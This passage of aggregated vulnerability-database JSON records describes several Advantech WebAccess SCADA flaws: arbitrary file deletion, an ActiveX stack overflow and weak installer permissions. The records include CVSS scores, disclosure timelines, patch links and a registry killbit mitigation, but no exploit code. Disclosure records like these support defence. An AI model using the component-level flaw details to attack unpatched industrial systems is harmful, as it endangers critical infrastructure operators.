"CNNVD-201810-1189", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-125018", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "VULHUB", "id": "VHN-125018" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "CNNVD", "id": "CNNVD-201810-1189" }, { "db": "NVD", "id": "CVE-2018-14820" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.1 and earlier has a .dll component that is susceptible to external control of file name or path vulnerability, which may allow an arbitrary file deletion when processing. Advantech WebAccess Contains an input validation vulnerability.Information may be tampered with. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to delete files under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. .dll is one of the dynamic link library components. A security vulnerability exists in the .dll component of Advantech WebAccess 8.3.1 and earlier. Advantech WebAccess is prone to the following security vulnerabilities:\n1. A stack-based buffer overflow vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary-file-deletion vulnerability\n4. This may aid in further attacks. \nAdvantech WebAccess 8.3.1 and prior versions are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2018-14820" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "BID", "id": "105728" }, { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125018" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-14820", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-296-01", "trust": 3.4 }, { "db": "BID", "id": "105728", "trust": 2.6 }, { "db": "SECTRACK", "id": "1041939", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201810-1189", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-21919", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011086", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6286", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1299", "trust": 0.7 }, { "db": "IVD", "id": "E2FEA1C1-39AB-11E9-962F-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-125018", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "VULHUB", "id": "VHN-125018" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "CNNVD", "id": "CNNVD-201810-1189" }, { "db": "NVD", "id": "CVE-2018-14820" } ] }, "id": "VAR-201810-0398", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "VULHUB", "id": "VHN-125018" } ], "trust": 1.4399341300000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21919" } ] }, "last_update_date": "2024-11-23T22:06:35.843000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "https://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01" }, { "title": "Advantech WebAccess patch for arbitrary file removal vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143337" }, { "title": "Advantech WebAccess .dll Fixes for component security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86281" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "CNNVD", "id": "CNNVD-201810-1189" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.9 }, { "problemtype": "CWE-73", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125018" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "NVD", "id": "CVE-2018-14820" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/105728" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1041939" }, { "trust": 1.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01%2c" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14820" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14820" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01," } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "VULHUB", "id": "VHN-125018" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "CNNVD", "id": "CNNVD-201810-1189" }, { "db": "NVD", "id": "CVE-2018-14820" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1299" }, { "db": "CNVD", "id": "CNVD-2018-21919" }, { "db": "VULHUB", "id": "VHN-125018" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "db": "CNNVD", "id": "CNNVD-201810-1189" }, { "db": "NVD", "id": "CVE-2018-14820" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-26T00:00:00", "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1299" }, { "date": "2018-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2018-21919" }, { "date": "2018-10-23T00:00:00", "db": "VULHUB", "id": "VHN-125018" }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "date": "2018-10-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1189" }, { "date": "2018-10-23T20:29:00.623000", "db": "NVD", "id": "CVE-2018-14820" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1299" }, { "date": "2018-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2018-21919" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-125018" }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011086" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1189" }, { "date": "2024-11-21T03:49:51.920000", "db": "NVD", "id": "CVE-2018-14820" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1189" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Input validation vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011086" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Input validation error", "sources": [ { "db": "IVD", "id": "e2fea1c1-39ab-11e9-962f-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201810-1189" } ], "trust": 0.8 } }
var-201708-1585
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" }, { "db": "ZDI", "id": "ZDI-17-565" }, { "db": "CNVD", "id": "CNVD-2017-19441" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-565" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-565", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19441", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-565", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19441", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" }, { "db": "ZDI", "id": "ZDI-17-565" }, { "db": "CNVD", "id": "CNVD-2017-19441" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-565" }, { "db": "CNVD", "id": "CNVD-2017-19441" }, { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" } ], "trust": 1.35 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-565", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19441", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4102", "trust": 0.7 }, { "db": "IVD", "id": "7FBAEA8E-1789-4F6A-B559-464DE314E6D0", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" }, { "db": "ZDI", "id": "ZDI-17-565" }, { "db": "CNVD", "id": "CNVD-2017-19441" } ] }, "id": "VAR-201708-1585", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" }, { "db": "CNVD", "id": "CNVD-2017-19441" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" }, { "db": "CNVD", "id": "CNVD-2017-19441" } ] }, "last_update_date": "2022-05-17T02:02:25.666000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-565" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-565/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-565" }, { "db": "CNVD", "id": "CNVD-2017-19441" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0", "ident": null }, { "db": "ZDI", "id": "ZDI-17-565", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19441", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-565", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19441", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-565", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19441", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess nvA1Media Connect MediaPassword Stack Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" }, { "db": "CNVD", "id": "CNVD-2017-19441" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "7fbaea8e-1789-4f6a-b559-464de314e6d0" } ], "trust": 0.2 } }
var-201708-1126
Vulnerability from variot
An Incorrect Permission Assignment for Critical Resource issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Multiple files and folders with ACLs that affect other users are allowed to be modified by non-administrator accounts. Advantech WebAccess Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privilege on vulnerable installations of Advantech WebAccess. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. An attacker can leverage this vulnerability to execute arbitrary code under the context of Administrator, the IUSR account, or SYSTEM. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f" }, { "db": "ZDI", "id": "ZDI-17-713" }, { "db": "CNVD", "id": "CNVD-2017-23880" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007577" }, { "db": "CNNVD", "id": "CNNVD-201708-1275" }, { "db": "NVD", "id": "CVE-2017-12713" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007577" } ] }, "credits": { "_id": null, "data": "Fritz Sands - Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-17-713" } ], "trust": 0.7 }, "cve": "CVE-2017-12713", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "CVE-2017-12713", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CVE-2017-12713", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CNVD-2017-23880", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "VHN-103263", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2017-12713", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12713", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12713", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2017-12713", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-23880", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1275", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-103263", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f" }, { "db": "ZDI", "id": "ZDI-17-713" }, { "db": "CNVD", "id": "CNVD-2017-23880" }, { "db": "VULHUB", "id": "VHN-103263" }, { "db": "JVNDB", "id": "JVNDB-2017-007577" }, { "db": "CNNVD", "id": "CNNVD-201708-1275" }, { "db": "NVD", "id": "CVE-2017-12713" } ] }, "description": { "_id": null, "data": "An Incorrect Permission Assignment for Critical Resource issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Multiple files and folders with ACLs that affect other users are allowed to be modified by non-administrator accounts. Advantech WebAccess Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privilege on vulnerable installations of Advantech WebAccess. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. An attacker can leverage this vulnerability to execute arbitrary code under the context of Administrator, the IUSR account, or SYSTEM. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-12713" }, { "db": "JVNDB", "id": "JVNDB-2017-007577" }, { "db": "ZDI", "id": "ZDI-17-713" }, { "db": "CNVD", "id": "CNVD-2017-23880" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f" }, { "db": "VULHUB", "id": "VHN-103263" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-12713", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.4 }, { "db": "BID", "id": "100526", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201708-1275", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23880", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007577", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4897", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-713", "trust": 0.7 }, { "db": "IVD", "id": "2F47A910-CF77-46D0-B79D-4A34CB7B5C3F", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103263", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f" }, { "db": "ZDI", "id": "ZDI-17-713" }, { "db": "CNVD", "id": "CNVD-2017-23880" }, { "db": "VULHUB", "id": "VHN-103263" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007577" }, { "db": "CNNVD", "id": "CNNVD-201708-1275" }, { "db": "NVD", "id": "CVE-2017-12713" } ] }, "id": "VAR-201708-1126", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f" }, { "db": "CNVD", "id": "CNVD-2017-23880" }, { "db": "VULHUB", "id": "VHN-103263" } ], "trust": 1.582962455 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f" }, { "db": "CNVD", "id": "CNVD-2017-23880" } ] }, "last_update_date": "2024-11-23T21:53:49.897000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "title": "Advantech WebAccess is not authorized to patch vulnerabilities", "trust": 0.6, "url": 